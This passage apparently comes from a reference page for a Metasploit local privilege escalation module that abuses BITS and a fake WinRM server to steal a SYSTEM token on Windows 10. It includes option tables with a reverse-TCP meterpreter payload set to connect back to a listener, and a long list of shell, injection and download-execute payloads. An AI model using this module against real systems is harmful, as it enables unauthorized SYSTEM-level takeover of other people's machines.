local Windows Remote Management server (WinRM) every times it
starts. The module launches a fake WinRM server which listen on port
5985 and triggers BITS. When BITS starts, it tries to authenticate
to the Rogue WinRM server, which allows to steal a SYSTEM token.
This token is then used to launch a new process as SYSTEM user. In
the case of this exploit, notepad.exe is launched as SYSTEM. Then,
it write shellcode in its previous memory space and trigger its
execution. As this exploit uses reflective dll injection, it does
not write any file on the disk. See
/documentation/modules/exploit/windows/local/bits_ntlm_token_impersonation.md
for complementary words of information. Vulnerable operating systems
are Windows 10 and Windows servers where WinRM is not running. Lab
experiments has shown that Windows 7 does not exhibit the vulnerable
behavior. WARNING: - As this exploit runs a service on the target
(Fake WinRM on port 5985), a firewall popup may appear on target
screen. Thus, this exploit may not be completely silent. - This
exploit has been successfully tested on : Windows 10 (10.0 Build
19041) 32 bits Windows 10 Pro, Version 1903 (10.0 Build 18362) 64
bits - This exploit failed because of no BITS authentication attempt
on: Windows 7 (6.1 Build 7601, Service Pack 1) 32 bits - Windows
servers are not vulnerable because a genuine WinRM service is
already running, except if the user has disabled it (Or if this
exploit succeed to terminate it). - SE_IMPERSONATE_NAME or
SE_ASSIGNPRIMARYTOKEN_NAME privs are required. - BITS must not be
running. - This exploit automatically perform above quoted checks.
run "check" command to run checklist.
References:
https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
https://github.com/antonioCoco/RogueWinRM
Module Options
This is a complete list of options available in the windows/local/bits_ntlm_token_impersonation exploit:
msf6 exploit(windows/local/bits_ntlm_token_impersonation) > show options
Module options (exploit/windows/local/bits_ntlm_token_impersonation):
Name Current Setting Required Description
---- --------------- -------- -----------
HOST_PROCESS notepad.exe yes The process which will be launched as SYSTEM and execute metasploit shellcode. This process is launched without graphical interface so it is hidden.
SESSION yes The session to run this module on.
SHUTDOWN_SERVICES false yes Should this module attempt to shutdown BITS and WinRM services if they are running? Setting this parameter to true is useful only if SESSION is part of administrator group. In the common usecase (running as LOCAL SERVICE) you don't have enough privileges.
WINRM_RPORT 5985 yes Port the exploit will listen on for BITS connexion. As the principle of the exploit is to impersonate a genuine WinRM service, it should listen on WinRM port. This is in most case 5985 but in some configuration, it may be 47001.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC none yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Advanced Options
Here is a complete list of advanced options supported by the windows/local/bits_ntlm_token_impersonation exploit:
msf6 exploit(windows/local/bits_ntlm_token_impersonation) > show advanced
Module advanced options (exploit/windows/local/bits_ntlm_token_impersonation):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
ForceExploit false no Override check result
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 120 no Additional delay in seconds to wait for a session
Payload advanced options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadBindPort no Port to bind reverse tcp socket to on target system.
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the windows/local/bits_ntlm_token_impersonation module can exploit:
msf6 exploit(windows/local/bits_ntlm_token_impersonation) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the windows/local/bits_ntlm_token_impersonation exploit:
msf6 exploit(windows/local/bits_ntlm_token_impersonation) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/debug_trap normal No Generic x86 Debug Trap
2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 payload/generic/tight_loop normal No Generic x86 Tight Loop
5 payload/windows/dllinject/bind_hidden_ipknock_tcp normal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
6 payload/windows/dllinject/bind_hidden_tcp normal No Reflective DLL Injection, Hidden Bind TCP Stager
7 payload/windows/dllinject/bind_ipv6_tcp normal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
8 payload/windows/dllinject/bind_ipv6_tcp_uuid normal No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
9 payload/windows/dllinject/bind_named_pipe normal No Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
10 payload/windows/dllinject/bind_nonx_tcp normal No Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
11 payload/windows/dllinject/bind_tcp normal No Reflective DLL Injection, Bind TCP Stager (Windows x86)
12 payload/windows/dllinject/bind_tcp_rc4 normal No Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
13 payload/windows/dllinject/bind_tcp_uuid normal No Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
14 payload/windows/dllinject/reverse_hop_http normal No Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
15 payload/windows/dllinject/reverse_http normal No Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
16 payload/windows/dllinject/reverse_http_proxy_pstore normal No Reflective DLL Injection, Reverse HTTP Stager Proxy
17 payload/windows/dllinject/reverse_ipv6_tcp normal No Reflective DLL Injection, Reverse TCP Stager (IPv6)
18 payload/windows/dllinject/reverse_nonx_tcp normal No Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
19 payload/windows/dllinject/reverse_ord_tcp normal No Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
20 payload/windows/dllinject/reverse_tcp normal No Reflective DLL Injection, Reverse TCP Stager
21 payload/windows/dllinject/reverse_tcp_allports normal No Reflective DLL Injection, Reverse All-Port TCP Stager
22 payload/windows/dllinject/reverse_tcp_dns normal No Reflective DLL Injection, Reverse TCP Stager (DNS)
23 payload/windows/dllinject/reverse_tcp_rc4 normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
24 payload/windows/dllinject/reverse_tcp_rc4_dns normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
25 payload/windows/dllinject/reverse_tcp_uuid normal No Reflective DLL Injection, Reverse TCP Stager with UUID Support
26 payload/windows/dllinject/reverse_winhttp normal No Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
27 payload/windows/dns_txt_query_exec normal No DNS TXT Record Payload Download and Execution
28 payload/windows/download_exec normal No Windows Executable Download (http,https,ftp) and Execute
29 payload/windows/exec normal No Windows Execute Command
30 payload/windows/loadlibrary normal No Windows LoadLibrary Path
31 payload/windows/messagebox normal No Windows MessageBox
32 payload/windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
33 payload/windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
34 payload/windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
35 payload/windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
36 payload/windows/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
37 payload/windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
38 payload/windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
39 payload/windows/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
40 payload/windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
41 payload/windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
42 payload/windows/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
43 payload/windows/meterpreter/reverse_http_proxy_pstore normal No Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
44 payload/windows/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
45 payload/windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
46 payload/windows/meterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
47 payload/windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
48 payload/windows/meterpreter/reverse_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
49 payload/windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
50 payload/windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager
51 payload/windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
52 payload/windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
53 payload/windows/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
54 payload/windows/meterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
55 payload/windows/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
56 payload/windows/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
57 payload/windows/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
58 payload/windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline
59 payload/windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline
60 payload/windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline
61 payload/windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline
62 payload/windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
63 payload/windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline
64 payload/windows/metsvc_bind_tcp normal No Windows Meterpreter Service, Bind TCP
65 payload/windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline
66 payload/windows/patchupdllinject/bind_hidden_ipknock_tcp normal No Windows Inject DLL, Hidden Bind Ipknock TCP Stager
67 payload/windows/patchupdllinject/bind_hidden_tcp normal No Windows Inject DLL, Hidden Bind TCP Stager
68 payload/windows/patchupdllinject/bind_ipv6_tcp normal No Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
69 payload/windows/patchupdllinject/bind_ipv6_tcp_uuid normal No Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
70 payload/windows/patchupdllinject/bind_named_pipe normal No Windows Inject DLL, Windows x86 Bind Named Pipe Stager
71 payload/windows/patchupdllinject/bind_nonx_tcp normal No Windows Inject DLL, Bind TCP Stager (No NX or Win7)
72 payload/windows/patchupdllinject/bind_tcp normal No Windows Inject DLL, Bind TCP Stager (Windows x86)
73 payload/windows/patchupdllinject/bind_tcp_rc4 normal No Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
74 payload/windows/patchupdllinject/bind_tcp_uuid normal No Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
75 payload/windows/patchupdllinject/reverse_ipv6_tcp normal No Windows Inject DLL, Reverse TCP Stager (IPv6)
76 payload/windows/patchupdllinject/reverse_nonx_tcp normal No Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
77 payload/windows/patchupdllinject/reverse_ord_tcp normal No Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
78 payload/windows/patchupdllinject/reverse_tcp normal No Windows Inject DLL, Reverse TCP Stager
79 payload/windows/patchupdllinject/reverse_tcp_allports normal No Windows Inject DLL, Reverse All-Port TCP Stager
80 payload/windows/patchupdllinject/reverse_tcp_dns normal No Windows Inject DLL, Reverse TCP Stager (DNS)
81 payload/windows/patchupdllinject/reverse_tcp_rc4 normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
82 payload/windows/patchupdllinject/reverse_tcp_rc4_dns normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
83 payload/windows/patchupdllinject/reverse_tcp_uuid normal No Windows Inject DLL, Reverse TCP Stager with UUID Support
84 payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
85 payload/windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
86 payload/windows/patchupmeterpreter/bind_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
87 payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
88 payload/windows/patchupmeterpreter/bind_named_pipe normal No Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
89 payload/windows/patchupmeterpreter/bind_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
90 payload/windows/patchupmeterpreter/bind_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
91 payload/windows/patchupmeterpreter/bind_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
92 payload/windows/patchupmeterpreter/bind_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
93 payload/windows/patchupmeterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
94 payload/windows/patchupmeterpreter/reverse_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
95 payload/windows/patchupmeterpreter/reverse_ord_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
96 payload/windows/patchupmeterpreter/reverse_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
97 payload/windows/patchupmeterpreter/reverse_tcp_allports normal No Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
98 payload/windows/patchupmeterpreter/reverse_tcp_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
99 payload/windows/patchupmeterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
100 payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
101 payload/windows/patchupmeterpreter/reverse_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
102 payload/windows/peinject/bind_hidden_ipknock_tcp normal No Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
103 payload/windows/peinject/bind_hidden_tcp normal No Windows Inject PE Files, Hidden Bind TCP Stager
104 payload/windows/peinject/bind_ipv6_tcp normal No Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
105 payload/windows/peinject/bind_ipv6_tcp_uuid normal No Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
106 payload/windows/peinject/bind_named_pipe normal No Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
107 payload/windows/peinject/bind_nonx_tcp normal No Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
108 payload/windows/peinject/bind_tcp normal No Windows Inject PE Files, Bind TCP Stager (Windows x86)
109 payload/windows/peinject/bind_tcp_rc4 normal No Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
110 payload/windows/peinject/bind_tcp_uuid normal No Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
111 payload/windows/peinject/reverse_ipv6_tcp normal No Windows Inject PE Files, Reverse TCP Stager (IPv6)
112 payload/windows/peinject/reverse_named_pipe normal No Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
113 payload/windows/peinject/reverse_nonx_tcp normal No Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
114 payload/windows/peinject/reverse_ord_tcp normal No Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
115 payload/windows/peinject/reverse_tcp normal No Windows Inject PE Files, Reverse TCP Stager
116 payload/windows/peinject/reverse_tcp_allports normal No Windows Inject PE Files, Reverse All-Port TCP Stager
117 payload/windows/peinject/reverse_tcp_dns normal No Windows Inject PE Files, Reverse TCP Stager (DNS)
118 payload/windows/peinject/reverse_tcp_rc4 normal No Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
119 payload/windows/peinject/reverse_tcp_rc4_dns normal No Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
120 payload/windows/peinject/reverse_tcp_uuid normal No Windows Inject PE Files, Reverse TCP Stager with UUID Support
121 payload/windows/pingback_bind_tcp normal No Windows x86 Pingback, Bind TCP Inline
122 payload/windows/pingback_reverse_tcp normal No Windows x86 Pingback, Reverse TCP Inline
123 payload/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
124 payload/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
125 payload/windows/shell/bind_hidden_ipknock_tcp normal No Windows Command Shell, Hidden Bind Ipknock TCP Stager
126 payload/windows/shell/bind_hidden_tcp normal No Windows Command Shell, Hidden Bind TCP Stager
127 payload/windows/shell/bind_ipv6_tcp normal No Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
128 payload/windows/shell/bind_ipv6_tcp_uuid normal No Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
129 payload/windows/shell/bind_named_pipe normal No Windows Command Shell, Windows x86 Bind Named Pipe Stager
130 payload/windows/shell/bind_nonx_tcp normal No Windows Command Shell, Bind TCP Stager (No NX or Win7)
131 payload/windows/shell/bind_tcp normal No Windows Command Shell, Bind TCP Stager (Windows x86)
132 payload/windows/shell/bind_tcp_rc4 normal No Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
133 payload/windows/shell/bind_tcp_uuid normal No Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
134 payload/windows/shell/reverse_ipv6_tcp normal No Windows Command Shell, Reverse TCP Stager (IPv6)
135 payload/windows/shell/reverse_nonx_tcp normal No Windows Command Shell, Reverse TCP Stager (No NX or Win7)
136 payload/windows/shell/reverse_ord_tcp normal No Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
137 payload/windows/shell/reverse_tcp normal No Windows Command Shell, Reverse TCP Stager
138 payload/windows/shell/reverse_tcp_allports normal No Windows Command Shell, Reverse All-Port TCP Stager
139 payload/windows/shell/reverse_tcp_dns normal No Windows Command Shell, Reverse TCP Stager (DNS)
140 payload/windows/shell/reverse_tcp_rc4 normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
141 payload/windows/shell/reverse_tcp_rc4_dns normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
142 payload/windows/shell/reverse_tcp_uuid normal No Windows Command Shell, Reverse TCP Stager with UUID Support
143 payload/windows/shell/reverse_udp normal No Windows Command Shell, Reverse UDP Stager with UUID Support
144 payload/windows/shell_bind_tcp normal No Windows Command Shell, Bind TCP Inline
145 payload/windows/shell_bind_tcp_xpfw normal No Windows Disable Windows ICF, Command Shell, Bind TCP Inline
146 payload/windows/shell_hidden_bind_tcp normal No Windows Command Shell, Hidden Bind TCP Inline
147 payload/windows/shell_reverse_tcp normal No Windows Command Shell, Reverse TCP Inline
148 payload/windows/speak_pwned normal No Windows Speech API - Say "You Got Pwned!"
149 payload/windows/upexec/bind_hidden_ipknock_tcp normal No Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
150 payload/windows/upexec/bind_hidden_tcp normal No Windows Upload/Execute, Hidden Bind TCP Stager
151 payload/windows/upexec/bind_ipv6_tcp normal No Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
152 payload/windows/upexec/bind_ipv6_tcp_uuid normal No Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
153 payload/windows/upexec/bind_named_pipe normal No Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
154 payload/windows/upexec/bind_nonx_tcp normal No Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
155 payload/windows/upexec/bind_tcp normal No Windows Upload/Execute, Bind TCP Stager (Windows x86)
156 payload/windows/upexec/bind_tcp_rc4 normal No Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
157 payload/windows/upexec/bind_tcp_uuid normal No Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
158 payload/windows/upexec/reverse_ipv6_tcp normal No Windows Upload/Execute, Reverse TCP Stager (IPv6)
159 payload/windows/upexec/reverse_nonx_tcp normal No Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
160 payload/windows/upexec/reverse_ord_tcp normal No Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
161 payload/windows/upexec/reverse_tcp normal No Windows Upload/Execute, Reverse TCP Stager
162 payload/windows/upexec/reverse_tcp_allports normal No Windows Upload/Execute, Reverse All-Port TCP Stager
163 payload/windows/upexec/reverse_tcp_dns normal No Windows Upload/Execute, Reverse TCP Stager (DNS)
164 payload/windows/upexec/reverse_tcp_rc4 normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
165 payload/windows/upexec/reverse_tcp_rc4_dns normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
166 payload/windows/upexec/reverse_tcp_uuid normal No Windows Upload/Execute, Reverse TCP Stager with UUID Support
167 payload/windows/upexec/reverse_udp normal No Windows Upload/Execute, Reverse UDP Stager with UUID Support
168 payload/windows/vncinject/bind_hidden_ipknock_tcp normal No VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
169 payload/windows/vncinject/bind_hidden_tcp normal No VNC Server (Reflective Injection), Hidden Bind TCP Stager
170 payload/windows/vncinject/bind_ipv6_tcp normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
171 payload/windows/vncinject/bind_ipv6_tcp_uuid normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
172 payload/windows/vncinject/bind_named_pipe normal No VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
173 payload/windows/vncinject/bind_nonx_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
174 payload/windows/vncinject/bind_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
175 payload/windows/vncinject/bind_tcp_rc4 normal No VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
176 payload/windows/vncinject/bind_tcp_uuid normal No VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
177 payload/windows/vncinject/reverse_hop_http normal No VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
178 payload/windows/vncinject/reverse_http normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
179 payload/windows/vncinject/reverse_http_proxy_pstore normal No VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
180 payload/windows/vncinject/reverse_ipv6_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
181 payload/windows/vncinject/reverse_nonx_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
182 payload/windows/vncinject/reverse_ord_tcp normal No VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
183 payload/windows/vncinject/reverse_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager
184 payload/windows/vncinject/reverse_tcp_allports normal No VNC Server (Reflective Injection), Reverse All-Port TCP Stager
185 payload/windows/vncinject/reverse_tcp_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
186 payload/windows/vncinject/reverse_tcp_rc4 normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
187 payload/windows/vncinject/reverse_tcp_rc4_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
188 payload/windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
189 payload/windows/vncinject/reverse_winhttp normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
190 payload/windows/x64/exec normal No Windows x64 Execute Command
191 payload/windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path
192 payload/windows/x64/messagebox normal No Windows MessageBox x64
193 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
194 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
195 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
196 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
197 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
198 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
199 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
200 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
201 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
202 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
203 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
204 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
205 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
206 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
